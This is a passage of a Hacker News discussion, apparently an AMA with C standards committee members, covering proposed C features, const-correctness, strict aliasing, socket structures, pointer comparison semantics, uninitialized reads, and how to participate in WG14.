Also, back then build tools were very simple, and some of them were not my favorite things to use (Imake, I'm looking at you). Build tools have advanced a lot since then. Features like reliable, deterministic incremental builds exist now. Some things could be less tedious to configure and maintain. There are probably best practices and preferred choices in build tools, but what exactly they are is another thing I'd want to know.

These are probably not questions that necessarily need an answer from people whose expertise is the language itself, though, so I guess this is a tangent.


People did know about security back then, since it was one of the driving design factors of the Burroughs systems created in 1961, still sold by Unisys as ClearPath MCP for highly secured deployment environments.

And there were plenty of security related papers and OSes from other companies like IBM, Xerox and DEC.


Is there any plan to deal with the locale fiasco at some point?

Some hints on what I'm referring to can be found here: https://github.com/mpv-player/mpv/commit/1e70e82baa9193f6f02...

Unrelated, but I also miss a binary constant notation (such as 0b10101)


I know that we're not voting, but I miss a binary literal very much. I would also like a literal digit separator to improve readability. Verilog Hardware Description Language does that with an underscore [1]. For example, 0xad_beef to improve readability of a hex literal, and 0b011_1010 to improve readability of a binary literal.

1: http://verilog.renerta.com/mobile/source/vrg00020.htm


If they pick this up, they will likely use C++'s syntax/rules.


In the same vein, I really like being able to use underscores in binary and hex literals to denote subfields in hardware registers.

0xDEADB_EEF

0b1_010_110111001001

etc.


Should take Verilog binary construction syntax, like { 12'd12, 16'hffee, 3'b101 } (or something similar that would fit with C's syntax).


Maybe not.


Why not? If you have to combine bit fields now, it's a mess of shifting and masking.


Many C compilers offer, as an extension, the very binary constant notation that you miss, as anyone who has worked on the front-end of a C static analyzer would tell you.


Yes, I'm aware. But we can agree it would be welcome in the standard, can't we?


Yes, if only so that we (as a category) do not have to discover it exists when already facing C programs that use it.


For binary constant notation, I have incorporated the following macro into my projects: https://gist.github.com/61131/009961b781f387ed1474ffaf19e375...


I haven't read most of that rant, but a thread-local setlocale() would be a godsend. Not sure if that's ISO C or POSIX though.


POSIX has added _l variants taking a locale_t argument to all the relevant string functions. I can see how per-thread state would be convenient, but it's not a comprehensive solution. With the _l variants you can write your own wrappers that pass a per-thread locale_t object.


That's uselocale().


What's the best way to deal with "transitive const-ness", i.e. utility functions that operate on pointers and where the return type should technically get const from the argument?

(strchr is the most obvious, but in general most search/lookup type functions are like this...)

Add to clarify: the current prototype for strchr is

  char *strchr(const char *s, int c);
Which just drops the "const", so you might end up writing to read-only memory without any warning. Ideally there'd be something like:

  maybe_const_out char *strchr(maybe_const_in char *s, int c);
So the return value gets const from the input argument. Maybe this can be done with _Generic? That kinda seems like the "cannonball at sparrows" approach though :/ (Also you'd need to change the official strchr() definition...)


Speaking as someone who is not in the committee but has observed trends since 2003 or so, I would say that solving this problem is way beyond the scope of evolutions that will make it in C2a or even the next one.

There are plenty of programming languages that distinguish strongly between mutable and immutable references, and that have the parametric polymorphism to let functions that can use both kinds return the same thing you passed to them, though. C will simply just never be one of them.


Many uses of strchr do write via a pointer derived from a non-const declaration. When we introduced const qualifier it was noted that they were actually declaring read-only access, not unchangeability. The alternative was tried experimentally and the consequent "const poisoning" got in the way.


I believe C is doing the right thing. Const as immutability is a kludge to force the language to operate at the level of data structure/API design, something that it cannot do properly.


Have you ever used a high-level statically-typed language, e.g. haskell?


The straight-forward approach is just two functions, one with `const` and one without (You can make one of them `static inline` around the other and do some casting to avoid implementing the same thing twice).

With that, selecting the correct function via `_Generic` should be possible (`_Generic` is a bit fiddly, but matching on `const char * ` and `char * ` should work just fine for this), and for the most part this is actually an/the intended use case for `_Generic` - it's basically the same as the type-generic math functions, more or less.


The committee has reviewed a proposal (document N2360) for const-correct string functions.

But making function signatures const-correct solves only a small part of the problem. A new API can only be used in new code, and casts can remove the constness from pointers leaving open the possibility that poorly written code will inadvertently change the const object. An attempt to change a global variable declared const will in all likelihood crash, but changing a local const can cause much more subtle bugs.

In my view, a more complete solution must include improving the detection of these types of bugs in compilers and other static and even dynamic analyzers, even without requiring code changes. It's not any more difficult than detecting out-of-bounds accesses. (In full generality it cannot be done just by relying on const; some other annotation is necessary to specify that a function that takes a const pointer doesn't cast the constness away and modify the object regardless.)


One proposal solved this by doing exactly that:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2068.pdf


How about allowing `return` to be used as a qualifier within a function or prototype's argument which, if present, would adjust the qualifiers of the function's return value to match those of the argument, e.g. adding "const" or removing "volatile" as appropriate?

Thus, if one did:

    char *strchr2(char return *restrict src, char target)
    {
      while(*src)
      {
        if (*src == target) return src;
        src++;
      }
      return 0; /* target not found */
    }
then one version of the function could support both const and non-const usage. BTW, I'd also like to see "register" and "return register" be usable as qualifiers for pointer-type function parameters which would promise that the passed-in pointer wouldn't "escape", or else that it could only escape through the return value (so a compiler that could see everything done with the return value wouldn't have to worry about the argument escaping).


strchr() is one of several C library functions that have this issue.

C++ solved this by overloading strchr():

    const char *strchr(const char *s, int c);
    char *strchr(char *s, int c);
C of course doesn't have overloading.

One solution could have been to define two functions with different names, perhaps "strchr" and "strcchr". The time to do that would have been 1989, when the original ANSI C standard was published.

I suppose a future C standard could leave strchr() as it is (necessary to avoid breaking existing code) and add two new functions.


A lot C programmers prefer to keep structures within the C source file ("module"), as a poor man's encapsulation. For example:

component.h:

    struct obj;
    typedef struct obj obj_t;

    obj_t *obj_create(void);
    // .. the rest of the API
component.c:

    struct obj {
        int status;
        // .. whatever else
    };

    obj_t *
    obj_create(void)
    {
        return calloc(1, sizeof(obj_t));
    }
However, as the component grows in complexity, it often becomes necessary to separate out some of the functionality (in order to re-abstract and reduce the complexity) into another file or files, which also operate on "struct obj". So, we move the structure into a header file under #ifdef __COMPONENT_PRIVATE (and/or component_impl.h) and sprinkle #define __COMPONENT_PRIVATE in the component source files. It's a poor man's "namespaces".

Basically, this boils down to the lack of namespaces/packages/modules in C. Are you aware of any existing compiler extensions (as a precedent or work in that direction) which could provide a better solution and, perhaps, one day end up in the C standard?

P.S. And if C ever grows such a feature, I really hope it will NOT be the C++ 'namespace' (amongst many other depressing things in C++). :)


I am sorry I do not have an answer to your question. It's a very valid one and I would be interested in any pointer to an answer.

What I can say while we are on the subject, is that I have seen C code (most often C code that started its life in the 1990s, to be fair) that instead of showing an abstract struct in the public interface, showed a different struct definition.

Please don't do this. Yes, when compiling nowadays, eventually every compilation unit ends up as object files passed to a linker that doesn't know about types, but this is undefined behavior. It makes it difficult to find undefined behavior in the rest of the code because there is a big undefined behavior right in the middle of it.


Wait, doesn't this mean that the BSD sockets API is inherently dependent on UB, casting different socket types to each other and sometimes only using the first few members, or am I misunderstanding you?


Yes and no.

The thing I am describing is when you link a compilation unit using:

  struct internal_state { int dummy; } state;
with another compilation unit that defined the same state differently:

  struct internal_state {
     int actual_meaningful_member_1;
     unsigned long actual_meaningful_member_2; } state;
As far as I know, BSD sockets do not do this. Zlib was doing this (https://github.com/pascal-cuoq/zlib-fork/blob/a52f0241f72433... ), but I have had the privilege of discussing this with Mark Adler, and I think the no-longer-necessary hack was removed from Zlib.

BSD sockets probably have a different kind of UB, related to so-called "strict aliasing" rules, unless they have been carefully audited and revised since the carefree times in which they were written. I am going to have to let you read this article for details (example st1, page 5): https://trust-in-soft.com/wp-content/uploads/2017/01/vmcai.p...


BSD sockets are weird in that the first struct's (sockaddr) size wasn't big enough, so APIs all take a nominal pointer to sockaddr but may require larger storage (sockaddr_storage) depending on the actual address.

  /*
   * Structure used by kernel to store most
   * addresses.
   */
  struct sockaddr {
          unsigned char   sa_len;         /* total length */
          sa_family_t     sa_family;      /* address family */
          char            sa_data[14];    /* actually longer; address value */
  };


  /*
   * RFC 2553: protocol-independent placeholder for socket addresses
   */
  #define _SS_MAXSIZE     128U
  #define _SS_ALIGNSIZE   (sizeof(__int64_t))
  #define _SS_PAD1SIZE    (_SS_ALIGNSIZE - sizeof(unsigned char) - \
                              sizeof(sa_family_t))
  #define _SS_PAD2SIZE    (_SS_MAXSIZE - sizeof(unsigned char) - \
                              sizeof(sa_family_t) - _SS_PAD1SIZE - _SS_ALIGNSIZE)
  
  struct sockaddr_storage {
          unsigned char   ss_len;         /* address length */
          sa_family_t     ss_family;      /* address family */
          char            __ss_pad1[_SS_PAD1SIZE];
          __int64_t       __ss_align;     /* force desired struct alignment */
          char            __ss_pad2[_SS_PAD2SIZE];
  };


struct sockaddr_storage is insufficient as well. A Unix domain socket path can be longer than `sizeof ((struct sockaddr_un){ 0}).sun_path`. That's a major reason why all the socket APIs take a separate socklen_t argument. Most people just assume that a domain socket path is limited to a relatively short string, but it's not (except possibly Minix, IIRC).


> A Unix domain socket path can be longer than `sizeof ((struct sockaddr_un){ 0}).sun_path`

Hm, I didn't realize this, or if I knew this I had forgotten. It makes sense because sun_path is usually pretty small, I believe 108 chars is the most common choice, and typically file paths are allowed to be much longer.

Do you have a citation for this behavior? I can't seem to find it, though I'm not looking very hard.

I guess you are right that any syscall taking a struct sockaddr * also has a length passed to it... Some systems have sa_len inside struct sockaddr to indicate length, but IIRC linux does not. I've often thought that length parameter was sort of redundant, because (1) some platforms have sa_len, and (2) even without that, you should be able to derive length from family. But your Unix domain socket example breaks (2). Without being able to do that, I start to imagine that the kernel would need to probe for NUL chars terminating the C string anytime it inspects a struct sockaddr_un, rather than block-copying the expected size of the structure -- that would be needlessly complicated.


So I just reran some tests on my existing VMs and it turns out I remembered wrong. Here's the actual break down:

* Solaris 11.4: .sun_path: 108; bind/connect path maximum: 1023. Length seems to be same as open. Interestingly, open path maximum seems to be 1023 (judged by trying ls -l /path/to/sock), although I always thought it was unbounded on Solaris.

* MacOS 10.14: .sun_path: 104, bind/connect path maximum: 253. Length can be bigger than .sun_path but less than open path limit.

* NetBSD 8.0: .sun_path: 104, bind/connect path maximum: 253. Same as MacOS.

* FreeBSD 12.0: .sun_path: 104, bind/connect path maximum: 104.

* OpenBSD 6.6: .sun_path: 104, bind/connect path maximum: 103 (104 - 1).

* Linux 5.4: .sun_path: 108, bind/connect path maximum: 108.

* AIX 7.1: .sun_path: 1023, bind/connect path maximum: 1023. Yes, .sun_path is statically sized to 1023! And like Solaris, open path maximum seems to be 1023 (as judged by trying ls -l /path/to/socket). Thanks to Polar Home, polarhome.com, for the free AIX shell account.

Note that all the above lengths are exclusive of NUL, and the passed socklen_t argument did not include a NUL terminator.

For posterity: on all these systems you can still create sockets with long paths, you just have to chdir or use bindat/connectat if available. My test code confirmed as much. And AFAICT getsockname/getpeername will only return the .sun_path path (if anything) used to bind or connect, but that's a more complex topic (see https://github.com/wahern/cqueues/blob/e3af1f63/PORTING.md#g...)


Linux also has the unusual extension of: if sun_path[0] is NUL, the path is not a filesystem path and the rest of the name buffer is an ID. I don't remember if that can have embedded NULs in that ID. I believe so.


I'm curious what exactly makes this undefined behavior.

And in particular, what about something like this?

    struct Foo {
    #ifdef __cplusplus
      int bar() const { return bar_; }
     private:
    #endif
      int bar_;
    };
Or, taking this a step further:

    struct _Foo;
    typedef struct _Foo Foo;

    // In C "struct _Foo" is never defined.
    int Foo_bar(const Foo* foo) { return *(int*)foo; }
    void Foo_setbar(Foo* foo, int bar) { *(int*)foo = bar; }
    Foo* Foo_new() { return malloc(sizeof(int)); }

    #ifdef __cplusplus
    struct _Foo {
      void set_bar(int bar) { bar_ = bar; }
      int bar() const { return bar_; }
     private:
      int bar_;
    };
    #endif
The above isn't ideal but it does provide encapsulation in a way that doesn't seem to violate strict aliasing (the memory location is consistently read/written as "int").


I think this is plenty ok. For one thing, if a struct has a member of type T, it's ok to access it through a pointer to T (and also the address of the struct is guaranteed to be identical to the address of the first member). For another, you are using dynamically allocated memory, so the only thing that matters is the type of the pointer when the access is finally made. It doesn't matter that it was a Foo* before, if what you dereference is an int*.

This is different from pretending that the address of a struct s { int a; double b; } is the address of a struct t { int a; long long c; } and accessing it through a pointer to that. If you do that, C compilers will (given the opportunity) assume that the write-through-a-pointer-to-struct-t does not modify any object of type “struct s”. This is what the example st1 in the article illustrates.

The latter is what I suspect plenty of socket implementations still do (because there are several types of sockets, represented by different struct types with a common prefix). It is possible to revise them carefully so that they do not break the rules, but I doubt this work has been done.


The ability to use pointers to structures with a Common Initial Sequence goes back at least to 1974--before unions were invented. When C89 was written, it would have been plausible that an implementation could uphold the Common Initial Sequence guarantees for pointers without upholding them for unions, but rather less plausible that implementations could do the reverse. Thus, the Standard explicitly specified that the guarantee is usable for unions, but saw no need to redundantly specify that it also worked for pointers.

If compilers recognized that an operation involving a pointer/lvalue that is visibly freshly based on another is an action that at least potentially involves the latter, that would be sufficient to make code that relies upon the CIS work. Unfortunately, some compilers are willfully blind to such things.


Yeah, the BSD socket API is kind of terrible like that. You could consider it an unspecified union type, or use memcpy() exclusively to access it safely.


Yeah, it depends on a well-agreed convention, but one which is UB according to the standard.


I assume you mean something like that:

    struct obj_impl {
        // real members
        ...
    };

    // In the public API header:

    struct obj {
        unsigned char _private[N]; // -- where N is the size of obj_impl
    };
I have seen such code too. It is also potentially error-prone. Certainly not advocating for it.


The ELF visibility attributes solve the part of the problem at the binary level (by hiding private library APIs from the application). The rest should be doable by structuring the project sources and headers in a suitable way.


ELF is very much not part of the C standard.


There are already "name spaces" of a sort in C, and modules are really just object files or libraries.

You can spread components in as many object files or libraries as you wish.

IMHO it's not a C related problem but a code design one.

Write libraries (with headers) only if you need to share the code but if you're not sure about that just include it for your specific program.

There is no shame in including local files containing declarations and definitions.

I think it is a misconception among C programmers that headers must be written even for purely local code.


1. How likely are named constants of any types to be included in C2x? I'm referring to the idea of making register const values be usable in constant expressions.

2. Is there, or was there ever a proposal to make struct types without a tag be structurally typed? This would not break backwards compatibility as far as I can see, and would make these types much more useful as ad-hoc bags of data. Small example:

  struct {size_t size; void *data;} data = get_data();
  int hash = hash_data(data);
I believe there was at least one proposal about error handling that more or less relied on the above to be valid semantically.

3. Is there any interest in making the variadic function interface a bit nicer to use? I would like to bring back an old feature and have an intrinsic to extract a pointer from the variadic parameter list, so that we can iterate over it ourselves (or even index directly).

  void *arg_ptr = va_ptr(last);
More out there would be a parameter that would be implicitly passed to a variadic function to indicate the number of arguments.

  void variadic(..., va_size count) {
  
  }

  variadic(10, 20, 30); // count would be three


(disclaimer: also a WG14 member)

1. I want this too.

2. Here is my proposal: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2366.pdf

3. Yes, variadic functions should be improved.


What is really missing from the C "aliasing" rules is a recognition that an access to a pointer/lvalue which is visibly freshly derived from another is, depending upon the form of derivation, either a definite or potential access to the former [in the former case, anything that couldn't be accessed by the original couldn't be accessed by the derived pointer/lvalue; in the latter case, the derived pointer/lvalue might access things the original could not].

I think the authors of C89 most likely thought that principle was sufficiently obvious that there was no need to expressly state it. Were it not for the Standard's rule forbidding it, an implementation might plausibly have ignored the possibility of an `int` being accessed via an `unsigned`, but I don't think the authors of the Standard imagined that a non-obtuse compiler writer wouldn't allow for the possibility that something like:

    void inc_float_bits(float *f)
    {
      *(unsigned*)f += 1;
    }
might affect the stored value of a `float`.

The present rules, as written, have absurd corner cases. Given something like:

    union U { float f[2]; unsigned ui[2]; } uu;
the Standard would, so far as I can tell, treat as identical the functions test1, test2, and test3 below:

    float test1(int i, int j)
    {
      uu.f[i] = 1.0f;
      uu.ui[j] += 1;
      return uu.f[i];
    }

    float test2(int i, int j)
    {
      *(uu.f+i) = 1.0f;
      *(uu.ui+j) += 1;
      return *(uu.f+i);
    }

    float evil(unsigned *ui, float *f)
    { *f = 1.0f; *ui += 1; return *f; }

    float test3(int i, int j)
    {
      return evil(uu.ui+j, uu.f+i);
    }
If a dereferenced pointer to union member type isn't allowed to access the union, the first example would be UB regardless of i and j, but that would imply that non-character arrays within unions are meaningless. If such pointers are allowed to access union objects, then test3 (and the evil function within it) would have defined behavior even when i and j are both zero.

BTW, I think any quality compiler should recognize the possibility of type punning in the first two, though the Standard doesn't actually require either. Neither clang nor gcc, however, recognizes the possibility of type punning in the second, even though the behavior of the [] operators in the first is defined as equivalent to the second.


I'd expect a proposal for (1) to be well received. The only proposal I recall that deals with (2) is http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2067.pdf. I think it's still being discussed. (3) is highly unlikely if it involves ABI changes. Even if it could be done without such changes, unless there is precedent for it in an existing compiler (and preferably more than one), it would likely be a tough sell.


Is the linked proposal really dealing with unnamed struct types? I skimmed it and it seems like it is dealing with named constants. Also, is there a proposal for (1) currently, or is someone planning on writing one? Regarding (3), yes, this one was mostly wishful thinking.


3. would have to be a new mechanism for variadic functions, one that would have to be distinguished in header files from the old mechanism, with which it is incompatible. So this proposal would imply some new keyword or syntax. I am not on the committee, but I don't think this is going to happen. The improvement is way too incremental to force new syntax.

(The committee is fine with incremental improvements, but new syntax needs to have strong motivation behind it, much stronger than this.)


Yes, I know that this is the most disruptive out of the three. The implicit parameter more so than the va_ptr() intrinsic (in my opinion), but I understand that changes like these are not very well motivated (except for a slightly nicer developer experience).


I have incorporated the following macro abuse, which prepends the number of arguments to a variadic function's argument list, into my projects: https://gist.github.com/61131/7a22ac46062ee292c2c8bd6d883d28.... It does introduce some overhead, but it suits my needs for the projects that I am working on.

That being said, I would like it if the default argument promotions for variadic functions promoted int to int64_t, the way float is already promoted to double, in order to be more reflective of the wider ranges supported by those types.


Many of your remaining questions have devolved into "When will I see my favorite feature xyz appear in the C Standard?" The answer in most cases is "that depends on how long it takes you to submit a proposal". Take a look at http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log... for previous proposals and review the minutes to see which proposals have been adopted. In general, the committee is not going to adopt proposals for which there is insufficient existing practice or haven't been fully thought out. There are cases where people have come to a single meeting with a well-considered proposal that was adopted into the C Standard. I wrote about one such case here: https://www.linkedin.com/pulse/alignment-requirements-memory... Alternatively, you can approach someone on the committee and ask us to champion a proposal for you. It is likely that we'll agree or at least provide you with feedback on your proposal.


Thanks to one and all for this AMA! The massive number of comments testifies to the continuing interest in C, and I think we're all grateful to all of you for your expertise, your patience, and your even-handed responses.


Is the present purpose of the Standard to:

1. define a highly-extensible abstraction model, which implementations intended for various purposes should be expected to extend to suit those purposes, or

2. define an abstraction model which is sufficiently complete that programs can do everything that would need to be done, without need for extensions?

Reading the C89 and C99 Rationale documents, it's clear that those standards were intended to meet the former purpose. The way some compilers treat "Undefined Behavior", however, suggests that the maintainers view the Standard as aimed toward the latter purpose.

During the 1980s and 1990s, it was generally cheaper and easier for implementations to extend the Standard's abstraction model by specifying that many actions would be processed "in a documented fashion characteristic of the environment" than it would have been to do anything else, so there was no need to worry about whether the Standard allowed programmers to specify when such behavior was required. That no longer holds true, however.

While it would be reasonable to deprecate code which relies upon such treatment without explicitly demanding it, such deprecation would only make sense if there were a means of demanding such treatment when required. For the Committee to provide such means, however, it would have to reach a consensus as to the purposes for which the Standard's abstraction model is meant to be suitable. Are you aware of any such consensus?


I don't know if you saw my question right below, since I guess I replied to the wrong post, but I'd be really interested to know how you view the purpose of the Standard. For years, the language has been caught in a catch-22 where the authors of the Standard have seen no need to have it recognize constructs that compilers have, almost unanimously, processed usefully for years without being required to do so, but some compiler maintainers interpret the failure to mandate such constructs as deprecation.

I would like to see the Standard either rewritten in such a way as to actually define (sometimes as optional features) everything necessary to make an implementation suitable for a wide range of tasks, or else expressly state that, e.g. "There are some circumstances where the behavior of some action would be documented by parts of the Standard, the documentation of the implementation and execution environment, or other materials, but some other portions of the Standard would characterize those actions as invoking Undefined Behavior. This Standard expressly waives jurisdiction in such cases so as to allow implementations designed for a variety of purposes to process them in whatever fashion would best suit those purposes."

What would you think about including something like those last two sentences in the Standard, so as to help clarify its intention?


What do you think about Zig language [0] and if you have any opinions on it, what distinguishing features would you like to see adopted in the C world?

[0] https://ziglang.org/


Not about the language exactly, so maybe not fair game, but: how did you all find yourselves joining ISO? And maybe more generally, what's the path for someone like a regular old software engineer to come to participate in the standardization process for something as significant and ubiquitous as the C programming language?


Great question!

Joining the committee requires you to be a member of your country's national body group (in the US, that's INCITS) and attend at least some percentage of the official committee meetings, and that's about it. So membership is not difficult, but it can be expensive. Many committee members are sponsored by their employers for this reason, but there's no requirement that you represent a company.

I joined the committees because I have a personal desire to reduce the amount of time it takes developers to find the bugs in their code, and one great way to reduce that is to design features that make it harder to write the bugs in the first place, or to turn unbounded undefined behavior into something more manageable. Others join because they have specific features they want to see adopted or want to lend their domain expertise in some area to the committee.


Related to that: the C++ standards body seems to be quite open to allowing non-members to participate (outside official votes, while still respecting those votes when looking for consensus). Is that just due to my limited observation, or is the C group less open? Any plans in that regard?


Most of us on the committee would like to see more participation from other experts. The committee's mailing list should be open even to non-members. Attendance by non-members at meetings might require an informal invitation (I imagine a heads up to the convener should do it).


I think that's right. These days, much of the discussion occurs through study subgroups (like the floating-point guys) and the committee e-mailing list.


I would love to see more open interactions between the broader C community and the WG14 committee. One of the plans I am currently working on is an update to the committee's webpage to at least make it more obvious as to how you can get involved. The page isn't ready to go live yet, but will hopefully be in shape soon.


A few years ago I came across this article Pointers Are More Abstract Than You Might Expect In C [1].

I followed the article which attempted to interpret the C standard and come to a conclusion. The conclusion is:

> The takeaway message is that pointer arithmetic is only defined for pointers pointing into array objects or one past the last element. Comparing pointers for equality is defined if both pointers are derived from the same (multidimensional) array object. Thus, if two pointers point to different array objects, then these array objects must be subaggregates of the same multidimensional array object in order to compare them. Otherwise this leads to undefined behavior.

Based on the above, I arrived at the conclusion that comparing two distinct malloc()'d pointers for equality is itself undefined behaviour, since malloc() is likely to return pointers to distinct objects that are not subaggregates of the same array object.

I know this is incorrect, but I don't know why I'm wrong.

[1]: https://stefansf.de/post/pointers-are-more-abstract-than-you...


The only thing that is not defined is comparing a pointer one-past-the-end to a pointer to the very beginning of a toplevel object. Apart from this rule, pointers of course do not need to be derived from the same object in order to be compared with == and !=.

&a + 1 == &b is unspecified: it may produce 0 or 1, and it may not produce the same result if you evaluate it several times.

Similarly, if both the char pointers p and q were obtained with malloc(10), after they have been tested for NULL, all these operations are valid:

  p == q (false)
  p + 1 == q (false)
  p + 1 == q + 1 (false)
  p + 10 == q + 1 (false)
Only p+10 == q and p == q+10 are unspecified (of the comparisons that can be built without invoking UB during the pointer arithmetic itself).

I have no idea what led that person to (apparently) write that &a==&b is undefined. This is plain wrong. I do not see any ambiguity in the relevant clause (https://port70.net/~nsz/c/c11/n1570.html#6.5.9p6 ). Yes, the standard is in English and natural languages are ambiguous, but you might as well claim that a+b is undefined because the standard does not define what the word “sum” means (https://port70.net/~nsz/c/c11/n1570.html#6.5.6p5 ).


That’s quite precise; can you give a sense of why it’s useful to have? Does it translate as “you can never know whether two mallocs are adjacent, so don’t even try merging them”?


One concrete reason why “unspecified” means “anything and not always the same thing” is to enable the maximum of optimizations.

Write a function c that compares pointers in one compilation unit, and in another compilation unit, define:

    int a, b;
    int X1 = (&a == &b + 1);
    int X2 = c(&a, &b + 1);
The compiler can optimize the computation of X1 on the basis that comparing an offset of &a to an offset of &b will always:

  - be false
  - or invoke undefined behavior
  - or be unspecified
But the optimization will not apply to the computation of X2, so the two variables X1 and X2 can receive different values when you execute this example, although they appear to compute the same thing.


I get why unspecified means that and it’s good to know what the limit is for applying an optimisation, but I was asking about why the specific comparison of “one past the end” with the beginning of another being unspecified would be useful. It’s cool you can optimise it out, but what does a compiler gain from being able to do that?

Imagine a standard that stated that > and < character comparisons involving '%' were unspecified. Why would this be good? It wouldn’t, so it’s not in any standard. But specifically it wouldn’t because (a) nobody writes ch < '%', and (b) if they did, compilers couldn’t make programs any faster, more portable, etc, because of its inclusion.

I guessed above that this is kinda like having hashmaps iterate in a random order: compilers do spooky things when you try to check whether two allocas/mallocs are adjacent, so don’t do it. Is that accurate? Or does it mean that compilers can move things around on the stack if they want, without worrying about updating the registers or locations that store the pointers, i.e. this is mainly to make compilers easier to write? If it’s that, I imagine I would want some other pointer comparisons on the list. The reason it’s in there is what I wanted you to shed some light on.


Oh, that was your question. In this case, the reason why &a + 1 == &b is unspecified is that:

- it's generally false—there is no reason for b to be just after a in memory, so these two addresses compare different.

- it is sometimes true: when addresses are implemented as integers, and compilers use exactly sizeof(T) bytes to represent an object of type T, and do not waste precious integers by leaving gaps between objects, and == between pointers is implemented as the assembly instruction that compares integers, sometimes that instruction produces true for &a + 1 == &b, because b was placed just after a in memory.

In short, &a + 1 == &b was made unspecified so that compilers could implement pointer == by the integer equality instruction, and could place objects in memory without having to leave gaps between them. Anything more specific (such as “&a + 1 == &b is always false”) would have forced compilers to take additional measures against providing the wrong answer.


Why is this undefined if it’s all just pointers to addresses in memory, regardless if the memory is valid for that object or not?


Here is an example I have at hand that shows that when you are using an optimizing compiler, there is no such thing as “just pointers to addresses in memory”. There are plenty more examples, but I do not have the other ones at hand.

https://gcc.godbolt.org/z/Budx3n


Please correct me if I am wrong, but I think the optimization here is possible because "*p = 2" is UB: the compiler can assume that "p" points to invalid memory. For this assumption, the compiler must know that "realloc" invalidates its first argument.

How does it know that? The definition of "realloc" lives in the source of "libc.so", so the compiler should not be able to see into it. Its declaration in "malloc.h" does not have any special attributes. Does the standard and/or the compiler handle "realloc" differently from other functions?

edit:

It looks like clang inserts a "noalias" attribute to the declaration of "realloc" in the LLVM IR, so it seems it does handle "realloc" specially.

    declare dso_local noalias i8* @realloc(i8* nocapture, i64) local_unnamed_addr #3


I would guess that it is because it gives some freedom to the compiler. e.g. If you have two pointers 'foo' and 'bar' that point to two separate structures (e.g. two arrays of ints), the compiler can always assume that the pointers, even with some adds/subtracts, will never 'collide', i.e. foo will never == bar, regardless of their relative memory positions.


Pointer equality (the == and != operators) is well defined for any pointers (of the same type) to any objects.

Relational operators (< <= > >=) on pointers have undefined behavior unless both pointers point to elements of the same array object or just past the end of it. A single non-array object is treated as a 1-element array for this purpose.

(That's for object pointers. Function pointers can be compared for equality, but relational operators on function pointers are invalid.)


Does the following code fragment cause undefined behaviour?

    unsigned int x;
    x -= x;
 
There's a lengthy StackOverflow thread where various C language-lawyers disagree on what the spec has to say about trap values, and under what circumstances reading an uninitialised variable causes UB. I'd appreciate an authoritative answer. Thanks for dropping by on HN!

https://stackoverflow.com/q/11962457/


Yes, it's undefined. It involves a read of an uninitialized local variable. Except for the special case of unsigned char, any uninitialized read is undefined.


>Except for the special case of unsigned char, any uninitialized read is undefined.

Could you expand on this?


An object of any type, initialized or not, can be read by an lvalue of unsigned char (or any character type). That lets functions like memcpy (either the standard one or a hand-rolled loop) copy arbitrary chunks of memory.

There's some debate about the effects of reading an uninitialized local variable of unsigned char (like whether the same value must be read each time, or whether it's okay for each read to yield a different value).

This special exemption doesn't extend to any other types, regardless of whether or not they have padding bits or trap representations that could cause the read to trap. Few types do, yet the behavior of uninitialized reads in existing implementations is demonstrably undefined (inconsistent or contradictory to invariants expressed in the code of a test case), so any subtleties one might derive from the text of the standard must be viewed in that light.


Thanks for your answers. A related question: this article [0] appears to single out memcpy and memmove as being special regarding effective type. Is it accurate? It seems to be at odds with your suggestion that there's nothing stopping me writing my own memcpy provided I'm careful to use the right types.

[0] https://en.cppreference.com/w/c/language/object#Effective_ty...


I think that may be inaccurate -- IIRC, in C, you can do type punning via a union but not memcpy, and in C++ you can do type punning via memcpy but not a union and this incompatibility drives me nuts because it makes inline functions in a header file shared between C and C++ really messy. (Moral of the story: don't pun types.)


The C standard also allows memcpy to be used for type punning:

    If a value is copied into an object having no declared type using memcpy or memmove,
    or is copied as an array of character type, then the effective type of the modified
    object for that access and for subsequent accesses that do not modify the value is
    the effective type of the object from which the value is copied, if it has one
Simply memcpy into a variable (as opposed to dynamically allocated memory).

https://port70.net/~nsz/c/c11/n1570.html#6.5p6


I must be remembering incorrectly then, thank you!


memcpy and memmove aren't special. The part that discusses the copying of allocated objects is 6.5, p6, quoted below:

The effective type of an object for an access to its stored value is the declared type of the object, if any. If a value is stored into an object having no declared type through an lvalue having a type that is not a character type, then the type of the lvalue becomes the effective type of the object for that access and for subsequent accesses that do not modify the stored value. If a value is copied into an object having no declared type using memcpy or memmove, or is copied as an array of character type, then the effective type of the modified object for that access and for subsequent accesses that do not modify the value is the effective type of the object from which the value is copied, if it has one. For all other accesses to an object having no declared type, the effective type of the object is simply the type of the lvalue used for the access.


I see, so in short the article is failing to reflect this excerpt: "or is copied as an array of character type". Thanks again.


Has there ever been any consensus as to what that "...or is copied as an array of character type..." text is supposed to mean, or what sort of hoops must be jumped through for a strictly conforming program to generate an object whose bit pattern matches another without copying the effective type thereof?



I'm guessing you were asking about this part rather than UB in general:

> Except for the special case of unsigned char,

The SO article makes the bizarre claim that because

(1) an unsigned char, per the standard, cannot have any padding bits, it therefore cannot have a trap representation. And

(2) if it cannot have a trap representation, the use of an uninitialized value isn't undefined.

I'm willing to buy (1) but I don't remember (2) being required for UB. I think (2) is the step that is harder to follow intuitively. Admittedly, I have not read that part of the standard closely in some time.


This example is clearly UB.

You could argue that it suddenly becomes less UB if you take the address of x:

  unsigned int x;
  &x;
  x -= x;
I'm not sure if this will add anything to the discussion on SO, but if you allow programs to do this, then after applying modern optimizing C compilers, you may end with multiplications by 2 that produce odd results, or uninitialized char variables that contain 500: http://blog.frama-c.com/index.php?post/2013/03/13/indetermin...

So the short answer is that, for all intents and purposes, you should consider use of uninitialized variables as UB, because C compilers already do. (There exists somewhere a document clarifying what C compilers can and cannot do with indeterminate values. A search for “wobbly values” might turn it up. Anyway, you do not want wobbly values in your C programs any more than you want undefined behavior.)


Interesting link, thanks. So then:

* Under C90, reading an uninitialized local was explicitly listed as UB.

* Under C99, if you weren't using a character type, it was still essentially UB, by way of trap values. (I don't think the particulars of the target hardware platform are relevant.)

* C11 reintroduced UB even for some cases involving character types. We were already invoking UB under C99, so we know we're still invoking UB under C11.

> You could argue that it suddenly becomes less UB if you take the address of x

I don't think so. As we're not using a character type, I don't think taking its address would change anything. This aligns with what msebor said.

Lastly, from the article:

    > No, GCC is still acting as if j *= 2; was undefined.
